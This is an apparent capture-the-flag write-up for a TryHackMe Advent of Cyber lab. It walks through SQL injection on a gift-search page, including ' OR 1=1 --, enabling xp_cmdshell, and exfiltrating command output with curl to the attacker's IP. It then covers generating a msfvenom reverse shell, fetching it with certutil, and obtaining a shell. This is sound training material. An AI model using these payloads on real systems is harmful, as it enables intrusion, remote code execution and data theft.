Challenge Information
- Advent of Cyber Day 10
- THM link here
Explanation
Today’s challenge will be web applicatio focusing on SQL injection.
Question 1: Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?
This answer could be easily found by going through each pages and features that the website have provided. The answer is /giftsearch.php.
Question 2: Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?
To get this answer, the first thing that we will need to do is perform SQL injection.
To perform SQL injection and get SQL error, we will need to add a single quote ' into the GET request. http://10.10.149.101/giftresults.php?age=child'&budget=0
Question 3: Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?
To inject 1=1 condition, we will need to use the classic SQL injection which is ' OR 1=1 -- . By using this SQL injection, we will be able to dump the database out.
Question 4: What flag is in the note file Gr33dstr left behind on the system?
To get this flag, we will need to get access into their server. This can be done with the help of SQL injection. Since we have SQL injection, we could manually enable xp_cmdshell in SQL server using EXECUTE queries.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
We could add this queries into SQL injection that we found to enable these features which allow us to perform remote code execution. To make sure that the RCE works, we could try to send some info into our machine by using nc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
## Before URLencoding
http://10.10.149.101/giftresults.php?age='; EXEC xp_cmdshell 'whoami | curl -d @- http://10.6.59.0:1234'; --
## SQL injection in web browser
curl "http://10.10.149.101/giftresults.php?age=%27;%20EXEC%20xp_cmdshell%20%27whoami%20%7C%20curl%20-d%20%40-%20http%3A%2F%2F10.6.59.0%3A1234%27;%20--"
## Result
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.59.0] from (UNKNOWN) [10.10.149.101] 49877
POST / HTTP/1.1
Host: 10.6.59.0:1234
User-Agent: curl/7.55.1
Accept: */*
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
nt service\mssql$sqlexpress
Now that we confirmed that we are able to perform RCE with SQL injection, we could move on to get a reverse shell. To do so, we will generate a reverse shell file.
1
2
3
4
5
6
7
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.59.0 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
After the reverse shell is generated, we will need to upload it. To do so, we will use certutil command to help while hosting a simple http server using python
1
2
3
4
5
6
7
8
9
10
## Simple http server
python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.149.101 - - [14/Dec/2023 12:50:36] "GET /reverse.exe HTTP/1.1" 200 -
10.10.149.101 - - [14/Dec/2023 12:50:36] "GET /reverse.exe HTTP/1.1" 200 -
## curl to execute command
curl "http://10.10.149.101/giftresults.php?age=%27;%20EXEC%20xp_cmdshell%20%27certutil%20-urlcache%20-f%20http://10.6.59.0:8000/reverse.exe%20C:\Windows\Temp\reverse.exe%27;%20-- "
After we manage to upload our file, we could just execute it and run our nc to get reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
## Execute the file
curl "http://10.10.149.101/giftresults.php?age=%27;%20EXEC%20xp_cmdshell%20%27C:\Windows\Temp\reverse.exe%27;%20--"
## nc result
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.6.59.0] from (UNKNOWN) [10.10.149.101] 49911
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt service\mssql$sqlexpress
Now that we have access, we could just get the note in desktop.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Windows\system32>type C:\Users\Administrator\Desktop\Note.txt
type C:\Users\Administrator\Desktop\Note.txt
====================
Hey h4ck3r0192,
I recieved your Bitcoin payment, thanks again for a speedy transaction.
After you gain access to the server, you can deface the website by running the deface_website.bat script in C:\Users\Administrator\Desktop. Feel free to dump the database and steal whatever you want.
If you need to revert the changes back to the original site for any reason, just run restore_website.bat from the same directory.
Also, I shouldn't need to mention this, but PLEASE DELETE this Note.txt file after defacing the website! Do NOT let this hack tie back to me.
-Gr33dstr
THM{b06674fedd8dfc28ca75176d3d51409e}
Question 5: What is the flag you receive on the homepage after restoring the website?
To restore the website, the note mention that we could just run restore_website.bat.
1
2
3
4
C:\Users\Administrator\Desktop>.\restore_website.bat
.\restore_website.bat
Removing all files and folders from C:\inetpub\wwwroot...
Website restoration completed. Please refresh the home (/index.php) page to see the changes and obtain your flag!
Now that is has restore, lets get the flag
Things I learned from the challenge
- Simple SQLi
- Trying to get rce using SQLi with windows machine
- execute command and send to attacker machine
- get RCE